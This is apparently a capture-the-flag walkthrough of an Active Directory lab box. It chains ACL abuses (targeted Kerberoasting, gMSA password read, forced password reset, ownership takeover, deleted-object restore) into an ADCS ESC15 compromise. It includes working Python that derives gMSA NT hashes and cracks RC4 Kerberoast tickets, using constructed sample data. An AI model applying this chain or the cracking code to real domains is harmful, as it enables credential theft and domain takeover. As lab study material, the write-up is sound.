Enumeration

Initial Credentials

As in most assumed-breach Active Directory engagements, the box starts with credentials for a low-privileged domain user.

00 - initial

Nmap

The initial nmap scan showed the service ports typical of a domain controller.

01 - nmap

SMB Enumeration

The user could authenticate over SMB, and the IPC$ share was readable.

02 - shares

A readable IPC$ is enough for RID cycling (looking up SIDs with sequential RIDs over the named pipes), so I brute-forced RIDs and turned the results into a user list.

03 - userList

BloodHound

I then collected the domain with bloodhound-python for further enumeration.

04 - bloodhound

Exploitation

From here on the path is a series of ACL-based lateral movements; I will walk through them step by step.

WriteSPN

The initial user had WriteSPN over alfred. Being able to write servicePrincipalName makes the account Kerberoastable on demand, so I used targetedKerberoast, which sets a temporary SPN, requests a service ticket for it and removes the SPN again, to obtain alfred's ticket hash.

05 - writespn

06 - alfred ticket

Then I cracked it with hashcat.

07 - cracked

AddSelf

alfred had AddSelf on the Infrastructure group, i.e. the validated write that lets him add his own account to the group's member attribute.

08 - addself

I used bloodyAD to add him to the group.

09 - added alfred

ReadGMSAPassword

The Infrastructure group had ReadGMSAPassword over the gMSA ansible_dev$: it is listed in the account's msDS-GroupMSAMembership, so its members may read the msDS-ManagedPassword attribute from which the account's NT hash is derived.

10 - readgmsa

I used netexec's gMSA option (--gmsa) to read the managed password as an NT hash.

11 - gmsa read password
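The two hash-related steps so far, the Kerberoast crack and the gMSA read, both come down to MD4 over UTF-16LE bytes. The block below is an added example (not netexec's, hashcat's or this write-up's code) that parses a msDS-ManagedPassword blob into the NT hash that nxc --gmsa prints, and verifies a $krb5tgs$23$ line the way hashcat -m 13100 does. The blob, the ticket, the realm EXAMPLE.LOCAL, the SPN and the passwords are constructed fixtures built by the same routines; only the account name alfred comes from the write-up.

```python
"""Added example (not from netexec, hashcat or the write-up): derive the NT hash that
nxc --gmsa prints from a msDS-ManagedPassword blob, and verify a $krb5tgs$23$ line
the way hashcat -m 13100 does. All sample data below is constructed."""
import hashlib, hmac, struct
from typing import Optional

M32 = 0xFFFFFFFF

def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; OpenSSL 3 hides MD4 behind the legacy provider."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, n: ((v << n) | (v >> (32 - n))) & M32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = ((f, 0, (3, 7, 11, 19), range(16)),
              (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
              (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)))
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, k, shifts, order in rounds:
            for i, w in enumerate(order):
                a = rotl((a + func(b, c, d) + x[w] + k) & M32, shifts[i % 4])
                a, b, c, d = d, a, b, c      # rotate registers so the next step updates "d", then "c", ...
        state = [(s + v) & M32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def md4(data: bytes) -> bytes:
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:                        # md4 not exposed by this OpenSSL build
        return _md4(data)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))

# --- gMSA: MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS) -> NT hash ---
def parse_managed_password(blob: bytes) -> bytes:
    """Current password bytes without the UTF-16 null terminator; this is what gets hashed."""
    version, _, length, cur, prev, query, _ = struct.unpack_from("<HHIHHHH", blob)
    if version != 1 or length != len(blob):
        raise ValueError("not a MSDS-MANAGEDPASSWORD_BLOB")
    return blob[cur:(prev or query)][:-2]     # no previous password right after creation

def build_managed_password_blob(password: bytes) -> bytes:
    """Constructed fixture laid out like the real attribute: 16-byte header, password, two intervals."""
    cur = password + b"\x00\x00"
    query = 16 + len(cur)
    header = struct.pack("<HHIHHHH", 1, 0, query + 16, 16, 0, query, query + 8)
    return header + cur + struct.pack("<QQ", 0, 0)

def gmsa_nt_hash(blob: bytes) -> str:
    return md4(parse_managed_password(blob)).hex()   # the bytes are already UTF-16LE

# --- Kerberoast: RC4-HMAC (etype 23) ticket enc-part, RFC 4757, hashcat mode 13100 ---
def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

USAGE_TGS_REP_TICKET = struct.pack("<I", 2)   # key usage 2: ticket enc-part under the service key

def make_krb5tgs_line(user: str, realm: str, spn: str, password: str, plaintext: bytes) -> str:
    """Constructed fixture: encrypt confounder+EncTicketPart as the KDC would, formatted like targetedKerberoast."""
    k1 = hmac.new(nt_hash(password), USAGE_TGS_REP_TICKET, "md5").digest()
    checksum = hmac.new(k1, plaintext, "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${rc4(k3, plaintext).hex()}"

def crack_krb5tgs(line: str, wordlist) -> Optional[str]:
    """Per candidate: NT hash -> K1 -> K3, decrypt, recompute the HMAC over the plaintext and compare."""
    head, checksum_hex, ct_hex = line.rsplit("$", 2)
    if head.split("$")[2] != "23":
        raise ValueError("only RC4-HMAC tickets are handled here")
    checksum, ct = bytes.fromhex(checksum_hex), bytes.fromhex(ct_hex)
    for candidate in wordlist:
        k1 = hmac.new(nt_hash(candidate), USAGE_TGS_REP_TICKET, "md5").digest()
        k3 = hmac.new(k1, checksum, "md5").digest()
        if hmac.compare_digest(hmac.new(k1, rc4(k3, ct), "md5").digest(), checksum):
            return candidate
    return None

# Constructed samples (account name from the write-up, secrets invented for the demo).
SAMPLE_BLOB = build_managed_password_blob("sample-gmsa-secret".encode("utf-16-le"))
SAMPLE_TICKET = make_krb5tgs_line("alfred", "EXAMPLE.LOCAL", "http/web01.example.local",
                                  "Summer2024!", b"\x00" * 8 + b"\x63\x82\x04\x10" + b"EncTicketPart body")
WORDLIST = ["password", "Welcome1", "Summer2024!", "P@ssw0rd"]
```

Two things worth noticing: a real gMSA password is 256 bytes of random UTF-16 that is not printable text, which is why the tools hand you the hash rather than the password, and the hash is directly usable for pass-the-hash; and the ticket check is cheap per candidate (two HMAC-MD5s, one RC4 pass, one MD4), which is why RC4 Kerberoast hashes crack so much faster than AES ones.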

Force Change Password

The ansible_dev$ account had ForceChangePassword over sam.

12 - force change password

Because I only had the NT hash of ansible_dev$ rather than its cleartext password, I reset sam's password with pth-net rpc, the pass-the-hash build of net rpc.

13 - change

WriteOwner

sam had WriteOwner over john.

14 - writeowner

So, as sam, I took ownership of john, used that to grant myself full control over the object, and changed his password.

15 - got john
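Every hop from WriteSPN to WriteOwner above is a single allow ACE whose access mask and object-type GUID BloodHound turns into an edge. As an added example (not from the write-up and not BloodHound's collector code), the block below performs that mapping for the edges used on this box. The Ace records at the bottom are constructed to mirror the path; the real DACLs were only visible in the screenshots, "initial_user" stands in for the unnamed starting account, and the function and constant names are mine.

```python
"""Added example (not from the write-up or from BloodHound's collectors): map the
access mask and object-type GUID of an ACE to the edge BloodHound draws for it.
The Ace records at the bottom are constructed to mirror this box's path; the real
DACLs were only seen in the BloodHound screenshots, and "initial_user" stands in
for the unnamed starting account."""
from dataclasses import dataclass
from typing import List, Optional, Set

# Access-mask bits (ADS_RIGHTS_ENUM plus the standard rights).
RIGHT_DS_SELF = 0x00000008            # validated write
RIGHT_DS_WRITE_PROP = 0x00000020
RIGHT_DS_CONTROL_ACCESS = 0x00000100  # extended right
RIGHT_WRITE_DAC = 0x00040000
RIGHT_WRITE_OWNER = 0x00080000
RIGHT_GENERIC_ALL = 0x10000000
FULL_CONTROL = 0x000F01FF             # how "Full control" normally appears in AD ACEs

# schemaIDGUID / rightsGuid values the object-specific edges key on.
GUID_SERVICE_PRINCIPAL_NAME = "f3a64788-5306-11d1-a9c5-0000f80367c1"
GUID_MEMBER = "bf9679c0-0de6-11d0-a285-00aa003049e2"   # also the Self-Membership validated write
GUID_USER_FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"

@dataclass(frozen=True)
class Ace:
    trustee: str                       # principal holding the right
    target: str                        # object whose DACL carries the ACE
    mask: int
    object_type: Optional[str] = None  # GUID scoping an object-specific right; None = whole object

def edges_for_ace(ace: Ace) -> Set[str]:
    """Name the BloodHound edges implied by one allow ACE."""
    edges = set()
    full = bool(ace.mask & RIGHT_GENERIC_ALL) or (ace.mask & FULL_CONTROL) == FULL_CONTROL
    if full and ace.object_type is None:
        return {"GenericAll"}
    # Standard rights are not scoped by object type, so they apply regardless of the GUID.
    if ace.mask & RIGHT_WRITE_OWNER:
        edges.add("WriteOwner")
    if ace.mask & RIGHT_WRITE_DAC:
        edges.add("WriteDacl")
    # Object-specific rights only mean something together with their GUID.
    if ace.mask & RIGHT_DS_WRITE_PROP:
        if ace.object_type is None:
            edges.add("GenericWrite")
        elif ace.object_type == GUID_SERVICE_PRINCIPAL_NAME:
            edges.add("WriteSPN")
        elif ace.object_type == GUID_MEMBER:
            edges.add("AddMember")
    if ace.mask & RIGHT_DS_SELF and ace.object_type == GUID_MEMBER:
        edges.add("AddSelf")
    if ace.mask & RIGHT_DS_CONTROL_ACCESS:
        if ace.object_type is None:
            edges.add("AllExtendedRights")
        elif ace.object_type == GUID_USER_FORCE_CHANGE_PASSWORD:
            edges.add("ForceChangePassword")
    return edges

def describe_chain(aces: List[Ace]) -> List[str]:
    """Render each ACE as BloodHound would label it, in the order the write-up abused them."""
    return [f"{a.trustee} -[{edge}]-> {a.target}" for a in aces for edge in sorted(edges_for_ace(a))]

# Constructed ACEs for the chain in this write-up. The ReadGMSAPassword hop is not an ACE on the
# account object itself but comes from msDS-GroupMSAMembership, so it is not modelled here.
SAMPLE_ACES = [
    Ace("initial_user", "alfred", RIGHT_DS_WRITE_PROP, GUID_SERVICE_PRINCIPAL_NAME),
    Ace("alfred", "Infrastructure", RIGHT_DS_SELF, GUID_MEMBER),
    Ace("ansible_dev$", "sam", RIGHT_DS_CONTROL_ACCESS, GUID_USER_FORCE_CHANGE_PASSWORD),
    Ace("sam", "john", RIGHT_WRITE_OWNER),
    Ace("john", "OU=ADCS", FULL_CONTROL),
]
```

The mapping also explains the abuse order used for WriteOwner: owning an object does not by itself grant any DS right, but the owner may always rewrite the DACL, so the sequence is set owner, add a GenericAll ACE for yourself, then act on the object.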

User Flag

john had the CanPSRemote edge, so I logged in over WinRM and read the user flag.

16 - user flag

Privilege Escalation

john had GenericAll over the ADCS OU, but the OU contained no objects.

17 - generic all adcs ou

Enumerating Certificates

Enumerating with certipy-ad reported no vulnerable templates, so I dumped all templates instead and noticed that a SID that did not resolve to any name held object control over the WebServer template. An unresolvable SID in a DACL usually belongs to a principal that has since been deleted, so that was the lead to follow.

19 - a template include interesting sid

Recovering Deleted AD Object

First I checked whether that object had been deleted, using a command from this GitHub repo.

20 - deleted object

The object had indeed been deleted, and it was the user cert_admin. I found this post and used the commands from it to restore the object.

21 - restored it

I then collected with BloodHound again and saw that the restored object sits in the ADCS OU.

22 - it is in OU

Since john's GenericAll on the OU is inherited by the objects inside it, I could simply change cert_admin's password as john.

23 - updated password for cert_admin

ADCS - ESC15

Then I ran certipy-ad again with cert_admin's credentials.

24 - ran certipy

This time the WebServer template was reported as vulnerable to ESC15 (CVE-2024-49019, "EKUwu"): a schema version 1 template in which the enrollee supplies the subject, which lets the requester smuggle application policies the template never defined into the issued certificate.

25 - vulnerable

So I opened Certipy's official wiki. Method A did not work, but method B did and gave me the Administrator hash.

26 - pfx

27 - pfx2

28 - hash

Root Flag

With the Administrator hash, I got the root flag.

29 - got root

Pwned

Easy, peasy

30 - pwned it

